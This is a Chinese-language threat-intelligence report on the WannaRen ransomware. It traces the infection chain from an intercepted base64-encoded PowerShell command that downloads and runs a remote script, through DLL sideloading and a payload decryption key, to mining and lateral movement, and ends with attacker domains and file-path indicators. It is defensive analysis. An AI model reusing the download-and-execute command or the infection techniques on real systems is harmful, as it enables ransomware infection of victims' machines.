WannaRen无力查杀?其来路早已被切断

Unix/Linux > 物联网安全 文章作者:小飞侠 2020-04-09 13:45 阅读: loading...

近日,有网友在社交媒体公开求助,称感染了一款名为WannaRen的新型勒索软件,部分文件被加密,需要支付0.05个比特币(约合2500元)。

部分截图如下:

WannaRen解密器图标伪装Everything。

奇安信病毒响应中心在发现该情况后,第一时间发布了关于该WannaRen的样本解密器分析报告。

WannaRen勒索软件事件分析报告

https://mp.weixin.qq.com/s/pWB1Ex2X6AcSSMIswLizXg

勒索软件的样本解密器截图:

为了进一步补充攻击视角,奇安信威胁情报中心红雨滴团队详细分析事件后,将更多关于该勒索攻击的检测维度公布。

攻击事件分析

根据线索,我们发现于4月2号天擎用户的拦截日志显示

powershell.exe -ep bypass -eSQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0A**AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwA**AYwBvAG0AJwApACkA

通过解码发现powershell会去下载并执行cs.sslsngyl90.com的脚本。

实际上该域名会重定向至如下链接。

http://cpu.sslsngyl90.com/vip.txt

从Vip.txt中的脚本可见攻击者会从vim-cn.com图床上下载WINWORD.EXE和wwlib.dll,这种是典型的白加黑攻击手段。通过执行WINWORD.EXE即可加载于同一目录的wwlib.dll。

紧接着wwlib.dll会去加载Public\目录下的you程序,有趣的是,fm文件会记录程序的运行时间,该时间使用简体中文进行记录,因此攻击者是中国人的概率非常大。

该程序需要会使用busahk87909we对you进行解密,解密后在内存加载WannaRen勒索软件

之后的事,跟开头的感染后的症状一致了。

除了上面的勒索情况外,Powershell下载器还具有挖矿功能,其下载后会重命名为nb.exe,其意指中文的**

有趣的是,在事情发酵之后,攻击者删除了脚本中,下载勒索模块的链接,变成了下面这个模块。

我们可以合理的猜测,勒索软件作者都没有料到,就因为他将勒索软件命名为WannaRen,收到了如此大的关注,因此将链接删掉从而试图逃避检测。

然而目前事情居然上了微博热搜,而且阅读量高达1.1亿,只能说当年的WannaCry余威仍在不断散发,攻击者这次是不好跑了。

横向移动功能

从Powershell下载器中可以看到,攻击者会通过图床链接去下载永恒之蓝传播模块。

而office.exe实际上是自解压文件。

此外,该脚本还有一种很少见的横向移动辅助手法,该手法利用了Everything拥有的http服务器功能。

首先,其会在受害器上下载aaaa.exe,并保存到C:\Users\Public\目录下,功能为释放everything并开启http服务器功能,这样在同一内网的其他受害者就可以通过该http服务器下载上面的恶意程序,从而进一步的扩散受害面。

关联分析

通过攻击者的域名,我们发现sslsngyl90.com在1月份奇安信威胁情报中心与就已经将该域名与HideShadowMiner组织的攻击关联在一起,并将域名置黑,因此部署相关情报产品的用户均无遭受此威胁。

HideShadowMiner,国内统称为匿影组织,该组织此前一直进行挖矿攻击,此前国内友商就曾发布过该组织的攻击报告:

http://www.ijinshan.com/info/202003201525.shtml

此外,我们通过特征,发现匿影组织还使用了多个域名搭载同一套Powershell攻击框架发起攻击。

http://us.howappyoude.club/v.txt

http://cpu.goolecpuclan.xyz/vip.txt

相关攻击域名在全网的访问趋势图,时间集中在近期,符合事件发生时段。

除了上面的线索外,还需要注意的是,攻击者会通过微当下载去下载APK程序,并重命名为exe文件,但这也意味着,微当下载并没有识别出该APK是恶意的PE程序并进行了放行,这对于攻击者来说是一个非常好利用的资源。

微当下载的软件提交方式

总结

万幸的是,虽说整个攻击过程都被奇安信分析人员解析清楚,但是由于在2020年4月2号奇安信天擎就已经检测并执行Powershell攻击的行为,因此奇安信的用户无一中招。

此外,退一万步说,即使Powershell执行起来了,但是对应的勒索病毒模块同样被天擎查杀。

奇安信红雨滴团队提醒广大用户,及时备份重要文件,更新安装补丁,切勿打开社交媒体分享的来历不明的链接,不点击执行未知来源的邮件附件,不运行夸张的标题的未知文件,不安装非正规途径来源的APP。

我们提供了IOC,以供用户自查。

IOC

cpu.sslsngyl90.com/xx.txt

cpu.sslsngyl90.com/wmi.txt

us.howappyoude.club/v.txt

cpu.goolecpuclan.xyz/vip.txt

xx.sslsngyl90.com

xx.sslsngyl90.com

wmi.sslsngyl90.com

wmi.sslsngyl90.com

d.sslsngyl90.com

cs.sslsngyl90.com

cpu.sslsngyl90.com

sslsngyl90.com

相关恶意程序下发路径

C:\ProgramData\227.exe

C:\ProgramData\office.exe

C:\ProgramData\nb.exe

C:\ProgramData\WinRing0x64.sys

C:\ProgramData\officekms.exe

C:\ProgramData\xeexfrt.txt

C:\Users\Public\MicrosftEdgeCP.exe

C:\Users\Public\1\winlogtrf.exe

C:\ProgramData\227.txt

C:\Users\Public\ aaaa.exe

C:\Users\Public\you

C:\ProgramData\wwlib.dll

WannaRen勒索软件主体Hash

9854723bf668c0303a966f2c282f72ea

已获取点赞 +0

评论 点击评论